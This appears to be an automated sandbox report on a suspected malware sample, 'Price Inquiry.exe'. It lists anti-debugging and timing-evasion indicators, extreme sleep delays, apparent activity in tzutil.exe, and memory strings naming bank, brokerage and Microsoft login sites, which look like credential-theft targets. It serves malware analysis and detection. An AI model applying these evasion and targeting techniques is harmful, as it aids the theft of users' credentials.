Source: C:\Users\user\Desktop\Price Inquiry.exe	Memory allocated: 2DE0000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\Price Inquiry.exe	Memory allocated: 4DE0000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\Price Inquiry.exe	Memory allocated: 8F90000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\Price Inquiry.exe	Memory allocated: 9F90000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\Price Inquiry.exe	Memory allocated: A190000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\Price Inquiry.exe	Memory allocated: B190000 memory reserve \| memory write watch	Jump to behavior

Source: C:\Users\user\Desktop\Price Inquiry.exe

Code function: 4_2_0041ECED rdtsc

4_2_0041ECED

Source: C:\Users\user\Desktop\Price Inquiry.exe

Thread delayed: delay time: 922337203685477

Jump to behavior

Source: C:\Windows\SysWOW64\tzutil.exe	Window / User API: threadDelayed 1619			Jump to behavior
Source: C:\Windows\SysWOW64\tzutil.exe	Window / User API: threadDelayed 8355			Jump to behavior

Source: C:\Users\user\Desktop\Price Inquiry.exe	API coverage: 0.7 %
Source: C:\Windows\SysWOW64\tzutil.exe	API coverage: 2.7 %

Source: C:\Users\user\Desktop\Price Inquiry.exe TID: 3820	Thread sleep time: -922337203685477s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\tzutil.exe TID: 2876	Thread sleep count: 1619 > 30	Jump to behavior
Source: C:\Windows\SysWOW64\tzutil.exe TID: 2876	Thread sleep time: -3238000s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\tzutil.exe TID: 2876	Thread sleep count: 8355 > 30	Jump to behavior
Source: C:\Windows\SysWOW64\tzutil.exe TID: 2876	Thread sleep time: -16710000s >= -30000s	Jump to behavior
Source: C:\Program Files (x86)\MEfwFCeLoyzkUEHsoxGbRboBRshUiJaOZnONOFcplzTYGnhg\pfyyryeDyx.exe TID: 1464	Thread sleep time: -60000s >= -30000s	Jump to behavior
Source: C:\Program Files (x86)\MEfwFCeLoyzkUEHsoxGbRboBRshUiJaOZnONOFcplzTYGnhg\pfyyryeDyx.exe TID: 1464	Thread sleep time: -36000s >= -30000s	Jump to behavior

Source: C:\Windows\SysWOW64\tzutil.exe	Last function: Thread delayed
Source: C:\Windows\SysWOW64\tzutil.exe	Last function: Thread delayed

Source: C:\Windows\SysWOW64\tzutil.exe

Code function: 9_2_005AC6B0 FindFirstFileW,FindNextFileW,FindClose,

9_2_005AC6B0

Source: C:\Users\user\Desktop\Price Inquiry.exe

Thread delayed: delay time: 922337203685477

Jump to behavior

Source: q3a81SS.9.dr	Binary or memory string: Interactive Brokers - EU East & CentralVMware20,11696487552
Source: q3a81SS.9.dr	Binary or memory string: secure.bankofamerica.comVMware20,11696487552\|UE
Source: q3a81SS.9.dr	Binary or memory string: account.microsoft.com/profileVMware20,11696487552u
Source: Price Inquiry.exe, 00000000.00000002.2182737950.00000000079A0000.00000004.08000000.00040000.00000000.sdmp	Binary or memory string: FVmcInkfGi
Source: q3a81SS.9.dr	Binary or memory string: discord.comVMware20,11696487552f
Source: q3a81SS.9.dr	Binary or memory string: bankofamerica.comVMware20,11696487552x
Source: pfyyryeDyx.exe, 0000000B.00000002.4626667407.000000000139F000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllN
Source: q3a81SS.9.dr	Binary or memory string: www.interactivebrokers.comVMware20,11696487552}
Source: tzutil.exe, 00000009.00000002.4625966716.0000000002B2D000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dlli'N
Source: q3a81SS.9.dr	Binary or memory string: ms.portal.azure.comVMware20,11696487552
Source: q3a81SS.9.dr	Binary or memory string: Canara Change Transaction PasswordVMware20,11696487552
Source: q3a81SS.9.dr	Binary or memory string: Interactive Brokers - COM.HKVMware20,11696487552
Source: q3a81SS.9.dr	Binary or memory string: global block list test formVMware20,11696487552
Source: q3a81SS.9.dr	Binary or memory string: tasks.office.comVMware20,11696487552o
Source: q3a81SS.9.dr	Binary or memory string: AMC password management pageVMware20,11696487552
Source: q3a81SS.9.dr	Binary or memory string: interactivebrokers.co.inVMware20,11696487552d
Source: firefox.exe, 0000000C.00000002.2734496650.000001F410E3C000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
Source: q3a81SS.9.dr	Binary or memory string: interactivebrokers.comVMware20,11696487552
Source: q3a81SS.9.dr	Binary or memory string: dev.azure.comVMware20,11696487552j
Source: q3a81SS.9.dr	Binary or memory string: Interactive Brokers - HKVMware20,11696487552]
Source: q3a81SS.9.dr	Binary or memory string: microsoft.visualstudio.comVMware20,11696487552x
Source: q3a81SS.9.dr	Binary or memory string: netportal.hdfcbank.comVMware20,11696487552
Source: q3a81SS.9.dr	Binary or memory string: trackpan.utiitsl.comVMware20,11696487552h
Source: q3a81SS.9.dr	Binary or memory string: Interactive Brokers - NDCDYNVMware20,11696487552z
Source: q3a81SS.9.dr	Binary or memory string: www.interactivebrokers.co.inVMware20,11696487552~
Source: q3a81SS.9.dr	Binary or memory string: outlook.office365.comVMware20,11696487552t
Source: q3a81SS.9.dr	Binary or memory string: Canara Change Transaction PasswordVMware20,11696487552^
Source: q3a81SS.9.dr	Binary or memory string: Interactive Brokers - GDCDYNVMware20,11696487552p
Source: q3a81SS.9.dr	Binary or memory string: Interactive Brokers - EU WestVMware20,11696487552n
Source: q3a81SS.9.dr	Binary or memory string: outlook.office.comVMware20,11696487552s
Source: q3a81SS.9.dr	Binary or memory string: Test URL for global passwords blocklistVMware20,11696487552
Source: q3a81SS.9.dr	Binary or memory string: turbotax.intuit.comVMware20,11696487552t
Source: q3a81SS.9.dr	Binary or memory string: Canara Transaction PasswordVMware20,11696487552x
Source: q3a81SS.9.dr	Binary or memory string: Canara Transaction PasswordVMware20,11696487552}
Source: q3a81SS.9.dr	Binary or memory string: Interactive Brokers - non-EU EuropeVMware20,11696487552

Source: C:\Users\user\Desktop\Price Inquiry.exe

Process information queried: ProcessInformation

Jump to behavior

Source: C:\Users\user\Desktop\Price Inquiry.exe	Process queried: DebugPort			Jump to behavior
Source: C:\Windows\SysWOW64\tzutil.exe	Process queried: DebugPort			Jump to behavior

Source: C:\Users\user\Desktop\Price Inquiry.exe

Code function: 4_2_0041ECED rdtsc

4_2_0041ECED

Source: C:\Users\user\Desktop\Price Inquiry.exe

Code function: 4_2_004176A3 LdrLoadDll,

4_2_004176A3

Source: C:\Users\user\Desktop\Price Inquiry.exe	Code function: 4_2_01768158 mov eax, dword ptr fs:[00000030h]	4_2_01768158
Source: C:\Users\user\Desktop\Price Inquiry.exe	Code function: 4_2_01764144 mov eax, dword ptr fs:[00000030h]	4_2_01764144
Source: C:\Users\user\Desktop\Price Inquiry.exe	Code function: 4_2_01764144 mov eax, dword ptr fs:[00000030h]	4_2_01764144
Source: C:\Users\user\Desktop\Price Inquiry.exe	Code function: 4_2_01764144 mov ecx, dword ptr fs:[00000030h]	4_2_01764144
Source: C:\Users\user\Desktop\Price Inquiry.exe	Code function: 4_2_01764144 mov eax, dword ptr fs:[00000030h]	4_2_01764144
Source: C:\Users\user\Desktop\Price Inquiry.exe	Code function: 4_2_01764144 mov eax, dword ptr fs:[00000030h]	4_2_01764144
Source: C:\Users\user\Desktop\Price Inquiry.exe	Code function: 4_2_016D6154 mov eax, dword ptr fs:[00000030h]	4_2_016D6154
Source: C:\Users\user\Desktop\Price Inquiry.exe	Code function: 4_2_016D6154 mov eax, dword ptr fs:[00000030h]	4_2_016D6154
Source: C:\Users\user\Desktop\Price Inquiry.exe	Code function: 4_2_016CC156 mov eax, dword ptr fs:[00000030h]	4_2_016CC156
Source: C:\Users\user\Desktop\Price Inquiry.exe	Code function: 4_2_01700124 mov eax, dword ptr fs:[00000030h]	4_2_01700124
Source: C:\Users\user\Desktop\Price Inquiry.exe	Code function: 4_2_01790115 mov eax, dword ptr fs:[00000030h]	4_2_01790115
Source: C:\Users\user\Desktop\Price Inquiry.exe	Code function: 4_2_0177A118 mov ecx, dword ptr fs:[00000030h]	4_2_0177A118
Source: C:\Users\user\Desktop\Price Inquiry.exe	Code function: 4_2_0177A118 mov eax, dword ptr fs:[00000030h]	4_2_0177A118
Source: C:\Users\user\Desktop\Price Inquiry.exe	Code function: 4_2_0177A118 mov eax, dword ptr fs:[00000030h]	4_2_0177A118
Source: C:\Users\user\Desktop\Price Inquiry.exe	Code function: 4_2_0177A118 mov eax, dword ptr fs:[00000030h]	4_2_0177A118
Source: C:\Users\user\Desktop\Price Inquiry.exe	Code function: 4_2_0177E10E mov eax, dword ptr fs:[00000030h]	4_2_0177E10E
Source: C:\Users\user\Desktop\Price Inquiry.exe	Code function: 4_2_0177E10E mov ecx, dword ptr fs:[00000030h]	4_2_0177E10E
Source: C:\Users\user\Desktop\Price Inquiry.exe	Code function: 4_2_0177E10E mov eax, dword ptr fs:[00000030h]	4_2_0177E10E
Source: C:\Users\user\Desktop\Price Inquiry.exe	Code function: 4_2_0177E10E mov eax, dword ptr fs:[00000030h]	4_2_0177E10E
Source: C:\Users\user\Desktop\Price Inquiry.exe	Code function: 4_2_0177E10E mov ecx, dword ptr fs:[00000030h]	4_2_0177E10E
Source: C:\Users\user\Desktop\Price Inquiry.exe	Code function: 4_2_0177E10E mov eax, dword ptr fs:[00000030h]	4_2_0177E10E
Source: C:\Users\user\Desktop\Price Inquiry.exe	Code function: 4_2_0177E10E mov eax, dword ptr fs:[00000030h]	4_2_0177E10E
Source: C:\Users\user\Desktop\Price Inquiry.exe	Code function: 4_2_0177E10E mov ecx, dword ptr fs:[00000030h]	4_2_0177E10E
Source: C:\Users\user\Desktop\Price Inquiry.exe	Code function: 4_2_0177E10E mov eax, dword ptr fs:[00000030h]	4_2_0177E10E
Source: C:\Users\user\Desktop\Price Inquiry.exe	Code function: 4_2_0177E10E mov ecx, dword ptr fs:[00000030h]	4_2_0177E10E
Source: C:\Users\user\Desktop\Price Inquiry.exe	Code function: 4_2_017001F8 mov eax, dword ptr fs:[00000030h]	4_2_017001F8
Source: C:\Users\user\Desktop\Price Inquiry.exe	Code function: 4_2_017A61E5 mov eax, dword ptr fs:[00000030h]	4_2_017A61E5
Source: C:\Users\user\Desktop\Price Inquiry.exe	Code function: 4_2_0174E1D0 mov eax, dword ptr fs:[00000030h]	4_2_0174E1D0
Source: C:\Users\user\Desktop\Price Inquiry.exe	Code function: 4_2_0174E1D0 mov eax, dword ptr fs:[00000030h]	4_2_0174E1D0
Source: C:\Users\user\Desktop\Price Inquiry.exe	Code function: 4_2_0174E1D0 mov ecx, dword ptr fs:[00000030h]	4_2_0174E1D0
Source: C:\Users\user\Desktop\Price Inquiry.exe	Code function: 4_2_0174E1D0 mov eax, dword ptr fs:[00000030h]	4_2_0174E1D0
Source: C:\Users\user\Desktop\Price Inquiry.exe	Code function: 4_2_0174E1D0 mov eax, dword ptr fs:[00000030h]	4_2_0174E1D0
Source: C:\Users\user\Desktop\Price Inquiry.exe	Code function: 4_2_017961C3 mov eax, dword ptr fs:[00000030h]	4_2_017961C3
Source: C:\Users\user\Desktop\Price Inquiry.exe	Code function: 4_2_017961C3 mov eax, dword ptr fs:[00000030h]	4_2_017961C3
Source: C:\Users\user\Desktop\Price Inquiry.exe	Code function: 4_2_0175019F mov eax, dword ptr fs:[00000030h]	4_2_0175019F
Source: C:\Users\user\Desktop\Price Inquiry.exe	Code function: 4_2_0175019F mov eax, dword ptr fs:[00000030h]	4_2_0175019F
Source: C:\Users\user\Desktop\Price Inquiry.exe	Code function: 4_2_0175019F mov eax, dword ptr fs:[00000030h]	4_2_0175019F
Source: C:\Users\user\Desktop\Price Inquiry.exe	Code function: 4_2_0175019F mov eax, dword ptr fs:[00000030h]	4_2_0175019F
Source: C:\Users\user\Desktop\Price Inquiry.exe	Code function: 4_2_0178C188 mov eax, dword ptr fs:[00000030h]	4_2_0178C188
Source: C:\Users\user\Desktop\Price Inquiry.exe	Code function: 4_2_0178C188 mov eax, dword ptr fs:[00000030h]	4_2_0178C188
Source: C:\Users\user\Desktop\Price Inquiry.exe	Code function: 4_2_01710185 mov eax, dword ptr fs:[00000030h]	4_2_01710185
Source: C:\Users\user\Desktop\Price Inquiry.exe	Code function: 4_2_01774180 mov eax, dword ptr fs:[00000030h]	4_2_01774180
Source: C:\Users\user\Desktop\Price Inquiry.exe	Code function: 4_2_01774180 mov eax, dword ptr fs:[00000030h]	4_2_01774180
Source: C:\Users\user\Desktop\Price Inquiry.exe	Code function: 4_2_016CA197 mov eax, dword ptr fs:[00000030h]	4_2_016CA197
Source: C:\Users\user\Desktop\Price Inquiry.exe	Code function: 4_2_016CA197 mov eax, dword ptr fs:[00000030h]	4_2_016CA197
Source: C:\Users\user\Desktop\Price Inquiry.exe	Code function: 4_2_016CA197 mov eax, dword ptr fs:[00000030h]	4_2_016CA197
Source: C:\Users\user\Desktop\Price Inquiry.exe	Code function: 4_2_016FC073 mov eax, dword ptr fs:[00000030h]	4_2_016FC073
Source: C:\Users\user\Desktop\Price Inquiry.exe	Code function: 4_2_01756050 mov eax, dword ptr fs:[00000030h]	4_2_01756050
Source: C:\Users\user\Desktop\Price Inquiry.exe	Code function: 4_2_016D2050 mov eax, dword ptr fs:[00000030h]	4_2_016D2050
Source: C:\Users\user\Desktop\Price Inquiry.exe	Code function: 4_2_01766030 mov eax, dword ptr fs:[00000030h]	4_2_01766030
Source: C:\Users\user\Desktop\Price Inquiry.exe	Code function: 4_2_016CA020 mov eax, dword ptr fs:[00000030h]	4_2_016CA020
Source: C:\Users\user\Desktop\Price Inquiry.exe	Code function: 4_2_016CC020 mov eax, dword ptr fs:[00000030h]	4_2_016CC020
Source: C:\Users\user\Desktop\Price Inquiry.exe	Code function: 4_2_01754000 mov ecx, dword ptr fs:[00000030h]	4_2_01754000
Source: C:\Users\user\Desktop\Price Inquiry.exe	Code function: 4_2_01772000 mov eax, dword ptr fs:[00000030h]	4_2_01772000
Source: C:\Users\user\Desktop\Price Inquiry.exe	Code function: 4_2_01772000 mov eax, dword ptr fs:[00000030h]	4_2_01772000
Source: C:\Users\user\Desktop\Price Inquiry.exe	Code function: 4_2_01772000 mov eax, dword ptr fs:[00000030h]	4_2_01772000
Source: C:\Users\user\Desktop\Price Inquiry.exe	Code function: 4_2_01772000 mov eax, dword ptr fs:[00000030h]	4_2_01772000
Source: C:\Users\user\Desktop\Price Inquiry.exe	Code function: 4_2_01772000 mov eax, dword ptr fs:[00000030h]	4_2_01772000
Source: C:\Users\user\Desktop\Price Inquiry.exe	Code function: 4_2_01772000 mov eax, dword ptr fs:[00000030h]	4_2_01772000
Source: C:\Users\user\Desktop\Price Inquiry.exe	Code function: 4_2_01772000 mov eax, dword ptr fs:[00000030h]	4_2_01772000
Source: C:\Users\user\Desktop\Price Inquiry.exe	Code function: 4_2_01772000 mov eax, dword ptr fs:[00000030h]	4_2_01772000
Source: C:\Users\user\Desktop\Price Inquiry.exe	Code function: 4_2_016EE016 mov eax, dword ptr fs:[00000030h]	4_2_016EE016
Source: C:\Users\user\Desktop\Price Inquiry.exe	Code function: 4_2_016EE016 mov eax, dword ptr fs:[00000030h]	4_2_016EE016
Source: C:\Users\user\Desktop\Price Inquiry.exe	Code function: 4_2_016EE016 mov eax, dword ptr fs:[00000030h]	4_2_016EE016
Source: C:\Users\user\Desktop\Price Inquiry.exe	Code function: 4_2_016EE016 mov eax, dword ptr fs:[00000030h]	4_2_016EE016
Source: C:\Users\user\Desktop\Price Inquiry.exe	Code function: 4_2_017120F0 mov ecx, dword ptr fs:[00000030h]	4_2_017120F0
Source: C:\Users\user\Desktop\Price Inquiry.exe	Code function: 4_2_016D80E9 mov eax, dword ptr fs:[00000030h]	4_2_016D80E9
Source: C:\Users\user\Desktop\Price Inquiry.exe	Code function: 4_2_016CA0E3 mov ecx, dword ptr fs:[00000030h]	4_2_016CA0E3
Source: C:\Users\user\Desktop\Price Inquiry.exe	Code function: 4_2_017560E0 mov eax, dword ptr fs:[00000030h]	4_2_017560E0
Source: C:\Users\user\Desktop\Price Inquiry.exe	Code function: 4_2_016CC0F0 mov eax, dword ptr fs:[00000030h]	4_2_016CC0F0
Source: C:\Users\user\Desktop\Price Inquiry.exe	Code function: 4_2_017520DE mov eax, dword ptr fs:[00000030h]	4_2_017520DE
Source: C:\Users\user\Desktop\Price Inquiry.exe	Code function: 4_2_017960B8 mov eax, dword ptr fs:[00000030h]	4_2_017960B8
Source: C:\Users\user\Desktop\Price Inquiry.exe	Code function: 4_2_017960B8 mov ecx, dword ptr fs:[00000030h]	4_2_017960B8
Source: C:\Users\user\Desktop\Price Inquiry.exe	Code function: 4_2_017680A8 mov eax, dword ptr fs:[00000030h]	4_2_017680A8
Source: C:\Users\user\Desktop\Price Inquiry.exe	Code function: 4_2_016D208A mov eax, dword ptr fs:[00000030h]	4_2_016D208A
Source: C:\Users\user\Desktop\Price Inquiry.exe	Code function: 4_2_0177437C mov eax, dword ptr fs:[00000030h]	4_2_0177437C
Source: C:\Users\user\Desktop\Price Inquiry.exe	Code function: 4_2_01778350 mov ecx, dword ptr fs:[00000030h]	4_2_01778350
Source: C:\Users\user\Desktop\Price Inquiry.exe	Code function: 4_2_0175035C mov eax, dword ptr fs:[00000030h]	4_2_0175035C
Source: C:\Users\user\Desktop\Price Inquiry.exe	Code function: 4_2_0175035C mov eax, dword ptr fs:[00000030h]	4_2_0175035C
Source: C:\Users\user\Desktop\Price Inquiry.exe	Code function: 4_2_0175035C mov eax, dword ptr fs:[00000030h]	4_2_0175035C
Source: C:\Users\user\Desktop\Price Inquiry.exe	Code function: 4_2_0175035C mov ecx, dword ptr fs:[00000030h]	4_2_0175035C
Source: C:\Users\user\Desktop\Price Inquiry.exe	Code function: 4_2_0175035C mov eax, dword ptr fs:[00000030h]	4_2_0175035C
Source: C:\Users\user\Desktop\Price Inquiry.exe	Code function: 4_2_0175035C mov eax, dword ptr fs:[00000030h]	4_2_0175035C
Source: C:\Users\user\Desktop\Price Inquiry.exe	Code function: 4_2_0179A352 mov eax, dword ptr fs:[00000030h]	4_2_0179A352
Source: C:\Users\user\Desktop\Price Inquiry.exe	Code function: 4_2_01752349 mov eax, dword ptr fs:[00000030h]	4_2_01752349
Source: C:\Users\user\Desktop\Price Inquiry.exe	Code function: 4_2_01752349 mov eax, dword ptr fs:[00000030h]	4_2_01752349
Source: C:\Users\user\Desktop\Price Inquiry.exe	Code function: 4_2_01752349 mov eax, dword ptr fs:[00000030h]	4_2_01752349
Source: C:\Users\user\Desktop\Price Inquiry.exe	Code function: 4_2_01752349 mov eax, dword ptr fs:[00000030h]	4_2_01752349
Source: C:\Users\user\Desktop\Price Inquiry.exe	Code function: 4_2_01752349 mov eax, dword ptr fs:[00000030h]	4_2_01752349
Source: C:\Users\user\Desktop\Price Inquiry.exe	Code function: 4_2_01752349 mov eax, dword ptr fs:[00000030h]	4_2_01752349
Source: C:\Users\user\Desktop\Price Inquiry.exe	Code function: 4_2_01752349 mov eax, dword ptr fs:[00000030h]	4_2_01752349
Source: C:\Users\user\Desktop\Price Inquiry.exe	Code function: 4_2_01752349 mov eax, dword ptr fs:[00000030h]	4_2_01752349
Source: C:\Users\user\Desktop\Price Inquiry.exe	Code function: 4_2_01752349 mov eax, dword ptr fs:[00000030h]	4_2_01752349
Source: C:\Users\user\Desktop\Price Inquiry.exe	Code function: 4_2_01752349 mov eax, dword ptr fs:[00000030h]	4_2_01752349
Source: C:\Users\user\Desktop\Price Inquiry.exe	Code function: 4_2_01752349 mov eax, dword ptr fs:[00000030h]	4_2_01752349
Source: C:\Users\user\Desktop\Price Inquiry.exe	Code function: 4_2_01752349 mov eax, dword ptr fs:[00000030h]	4_2_01752349
Source: C:\Users\user\Desktop\Price Inquiry.exe	Code function: 4_2_01752349 mov eax, dword ptr fs:[00000030h]	4_2_01752349
Source: C:\Users\user\Desktop\Price Inquiry.exe	Code function: 4_2_01752349 mov eax, dword ptr fs:[00000030h]	4_2_01752349
Source: C:\Users\user\Desktop\Price Inquiry.exe	Code function: 4_2_01752349 mov eax, dword ptr fs:[00000030h]	4_2_01752349
Source: C:\Users\user\Desktop\Price Inquiry.exe	Code function: 4_2_0170A30B mov eax, dword ptr fs:[00000030h]	4_2_0170A30B
Source: C:\Users\user\Desktop\Price Inquiry.exe	Code function: 4_2_0170A30B mov eax, dword ptr fs:[00000030h]	4_2_0170A30B
Source: C:\Users\user\Desktop\Price Inquiry.exe	Code function: 4_2_0170A30B mov eax, dword ptr fs:[00000030h]	4_2_0170A30B
Source: C:\Users\user\Desktop\Price Inquiry.exe	Code function: 4_2_016CC310 mov ecx, dword ptr fs:[00000030h]	4_2_016CC310
Source: C:\Users\user\Desktop\Price Inquiry.exe	Code function: 4_2_016F0310 mov ecx, dword ptr fs:[00000030h]	4_2_016F0310
Source: C:\Users\user\Desktop\Price Inquiry.exe	Code function: 4_2_016E03E9 mov eax, dword ptr fs:[00000030h]	4_2_016E03E9
Source: C:\Users\user\Desktop\Price Inquiry.exe	Code function: 4_2_016E03E9 mov eax, dword ptr fs:[00000030h]	4_2_016E03E9
Source: C:\Users\user\Desktop\Price Inquiry.exe	Code function: 4_2_016E03E9 mov eax, dword ptr fs:[00000030h]	4_2_016E03E9
Source: C:\Users\user\Desktop\Price Inquiry.exe	Code function: 4_2_016E03E9 mov eax, dword ptr fs:[00000030h]	4_2_016E03E9
Source: C:\Users\user\Desktop\Price Inquiry.exe	Code function: 4_2_016E03E9 mov eax, dword ptr fs:[00000030h]	4_2_016E03E9
Source: C:\Users\user\Desktop\Price Inquiry.exe	Code function: 4_2_016E03E9 mov eax, dword ptr fs:[00000030h]	4_2_016E03E9
Source: C:\Users\user\Desktop\Price Inquiry.exe	Code function: 4_2_016E03E9 mov eax, dword ptr fs:[00000030h]	4_2_016E03E9
Source: C:\Users\user\Desktop\Price Inquiry.exe	Code function: 4_2_016E03E9 mov eax, dword ptr fs:[00000030h]	4_2_016E03E9
Source: C:\Users\user\Desktop\Price Inquiry.exe	Code function: 4_2_017063FF mov eax, dword ptr fs:[00000030h]	4_2_017063FF
Source: C:\Users\user\Desktop\Price Inquiry.exe	Code function: 4_2_016EE3F0 mov eax, dword ptr fs:[00000030h]	4_2_016EE3F0
Source: C:\Users\user\Desktop\Price Inquiry.exe	Code function: 4_2_016EE3F0 mov eax, dword ptr fs:[00000030h]	4_2_016EE3F0
Source: C:\Users\user\Desktop\Price Inquiry.exe	Code function: 4_2_016EE3F0 mov eax, dword ptr fs:[00000030h]	4_2_016EE3F0
Source: C:\Users\user\Desktop\Price Inquiry.exe	Code function: 4_2_017743D4 mov eax, dword ptr fs:[00000030h]	4_2_017743D4
Source: C:\Users\user\Desktop\Price Inquiry.exe	Code function: 4_2_017743D4 mov eax, dword ptr fs:[00000030h]	4_2_017743D4
Source: C:\Users\user\Desktop\Price Inquiry.exe	Code function: 4_2_0177E3DB mov eax, dword ptr fs:[00000030h]	4_2_0177E3DB
Source: C:\Users\user\Desktop\Price Inquiry.exe	Code function: 4_2_0177E3DB mov eax, dword ptr fs:[00000030h]	4_2_0177E3DB
Source: C:\Users\user\Desktop\Price Inquiry.exe	Code function: 4_2_0177E3DB mov ecx, dword ptr fs:[00000030h]	4_2_0177E3DB
Source: C:\Users\user\Desktop\Price Inquiry.exe	Code function: 4_2_0177E3DB mov eax, dword ptr fs:[00000030h]	4_2_0177E3DB
Source: C:\Users\user\Desktop\Price Inquiry.exe	Code function: 4_2_016DA3C0 mov eax, dword ptr fs:[00000030h]	4_2_016DA3C0
Source: C:\Users\user\Desktop\Price Inquiry.exe	Code function: 4_2_016DA3C0 mov eax, dword ptr fs:[00000030h]	4_2_016DA3C0
Source: C:\Users\user\Desktop\Price Inquiry.exe	Code function: 4_2_016DA3C0 mov eax, dword ptr fs:[00000030h]	4_2_016DA3C0
Source: C:\Users\user\Desktop\Price Inquiry.exe	Code function: 4_2_016DA3C0 mov eax, dword ptr fs:[00000030h]	4_2_016DA3C0
Source: C:\Users\user\Desktop\Price Inquiry.exe	Code function: 4_2_016DA3C0 mov eax, dword ptr fs:[00000030h]	4_2_016DA3C0
Source: C:\Users\user\Desktop\Price Inquiry.exe	Code function: 4_2_016DA3C0 mov eax, dword ptr fs:[00000030h]	4_2_016DA3C0
Source: C:\Users\user\Desktop\Price Inquiry.exe	Code function: 4_2_016D83C0 mov eax, dword ptr fs:[00000030h]	4_2_016D83C0
Source: C:\Users\user\Desktop\Price Inquiry.exe	Code function: 4_2_016D83C0 mov eax, dword ptr fs:[00000030h]	4_2_016D83C0
Source: C:\Users\user\Desktop\Price Inquiry.exe	Code function: 4_2_016D83C0 mov eax, dword ptr fs:[00000030h]	4_2_016D83C0
Source: C:\Users\user\Desktop\Price Inquiry.exe	Code function: 4_2_016D83C0 mov eax, dword ptr fs:[00000030h]	4_2_016D83C0
Source: C:\Users\user\Desktop\Price Inquiry.exe	Code function: 4_2_0178C3CD mov eax, dword ptr fs:[00000030h]	4_2_0178C3CD
Source: C:\Users\user\Desktop\Price Inquiry.exe	Code function: 4_2_017563C0 mov eax, dword ptr fs:[00000030h]	4_2_017563C0
Source: C:\Users\user\Desktop\Price Inquiry.exe	Code function: 4_2_016F438F mov eax, dword ptr fs:[00000030h]	4_2_016F438F
Source: C:\Users\user\Desktop\Price Inquiry.exe	Code function: 4_2_016F438F mov eax, dword ptr fs:[00000030h]	4_2_016F438F
Source: C:\Users\user\Desktop\Price Inquiry.exe	Code function: 4_2_016CE388 mov eax, dword ptr fs:[00000030h]	4_2_016CE388
Source: C:\Users\user\Desktop\Price Inquiry.exe	Code function: 4_2_016CE388 mov eax, dword ptr fs:[00000030h]	4_2_016CE388
Source: C:\Users\user\Desktop\Price Inquiry.exe	Code function: 4_2_016CE388 mov eax, dword ptr fs:[00000030h]	4_2_016CE388
Source: C:\Users\user\Desktop\Price Inquiry.exe	Code function: 4_2_016C8397 mov eax, dword ptr fs:[00000030h]	4_2_016C8397
Source: C:\Users\user\Desktop\Price Inquiry.exe	Code function: 4_2_016C8397 mov eax, dword ptr fs:[00000030h]	4_2_016C8397
Source: C:\Users\user\Desktop\Price Inquiry.exe	Code function: 4_2_016C8397 mov eax, dword ptr fs:[00000030h]	4_2_016C8397
Source: C:\Users\user\Desktop\Price Inquiry.exe	Code function: 4_2_016C826B mov eax, dword ptr fs:[00000030h]	4_2_016C826B
Source: C:\Users\user\Desktop\Price Inquiry.exe	Code function: 4_2_01780274 mov eax, dword ptr fs:[00000030h]	4_2_01780274
Source: C:\Users\user\Desktop\Price Inquiry.exe	Code function: 4_2_01780274 mov eax, dword ptr fs:[00000030h]	4_2_01780274
Source: C:\Users\user\Desktop\Price Inquiry.exe	Code function: 4_2_01780274 mov eax, dword ptr fs:[00000030h]	4_2_01780274
Source: C:\Users\user\Desktop\Price Inquiry.exe	Code function: 4_2_01780274 mov eax, dword ptr fs:[00000030h]	4_2_01780274
Source: C:\Users\user\Desktop\Price Inquiry.exe	Code function: 4_2_01780274 mov eax, dword ptr fs:[00000030h]	4_2_01780274
Source: C:\Users\user\Desktop\Price Inquiry.exe	Code function: 4_2_01780274 mov eax, dword ptr fs:[00000030h]	4_2_01780274
Source: C:\Users\user\Desktop\Price Inquiry.exe	Code function: 4_2_01780274 mov eax, dword ptr fs:[00000030h]	4_2_01780274
Source: C:\Users\user\Desktop\Price Inquiry.exe	Code function: 4_2_01780274 mov eax, dword ptr fs:[00000030h]	4_2_01780274
Source: C:\Users\user\Desktop\Price Inquiry.exe	Code function: 4_2_01780274 mov eax, dword ptr fs:[00000030h]	4_2_01780274
Source: C:\Users\user\Desktop\Price Inquiry.exe	Code function: 4_2_01780274 mov eax, dword ptr fs:[00000030h]	4_2_01780274
Source: C:\Users\user\Desktop\Price Inquiry.exe	Code function: 4_2_01780274 mov eax, dword ptr fs:[00000030h]	4_2_01780274
Source: C:\Users\user\Desktop\Price Inquiry.exe	Code function: 4_2_01780274 mov eax, dword ptr fs:[00000030h]	4_2_01780274
Source: C:\Users\user\Desktop\Price Inquiry.exe	Code function: 4_2_016D4260 mov eax, dword ptr fs:[00000030h]	4_2_016D4260
Source: C:\Users\user\Desktop\Price Inquiry.exe	Code function: 4_2_016D4260 mov eax, dword ptr fs:[00000030h]	4_2_016D4260
Source: C:\Users\user\Desktop\Price Inquiry.exe	Code function: 4_2_016D4260 mov eax, dword ptr fs:[00000030h]	4_2_016D4260
Source: C:\Users\user\Desktop\Price Inquiry.exe	Code function: 4_2_016D6259 mov eax, dword ptr fs:[00000030h]	4_2_016D6259
Source: C:\Users\user\Desktop\Price Inquiry.exe	Code function: 4_2_01758243 mov eax, dword ptr fs:[00000030h]	4_2_01758243
Source: C:\Users\user\Desktop\Price Inquiry.exe	Code function: 4_2_01758243 mov ecx, dword ptr fs:[00000030h]	4_2_01758243
Source: C:\Users\user\Desktop\Price Inquiry.exe	Code function: 4_2_016CA250 mov eax, dword ptr fs:[00000030h]	4_2_016CA250
Source: C:\Users\user\Desktop\Price Inquiry.exe	Code function: 4_2_016C823B mov eax, dword ptr fs:[00000030h]	4_2_016C823B
Source: C:\Users\user\Desktop\Price Inquiry.exe	Code function: 4_2_016E02E1 mov eax, dword ptr fs:[00000030h]	4_2_016E02E1
Source: C:\Users\user\Desktop\Price Inquiry.exe	Code function: 4_2_016E02E1 mov eax, dword ptr fs:[00000030h]	4_2_016E02E1
Source: C:\Users\user\Desktop\Price Inquiry.exe	Code function: 4_2_016E02E1 mov eax, dword ptr fs:[00000030h]	4_2_016E02E1
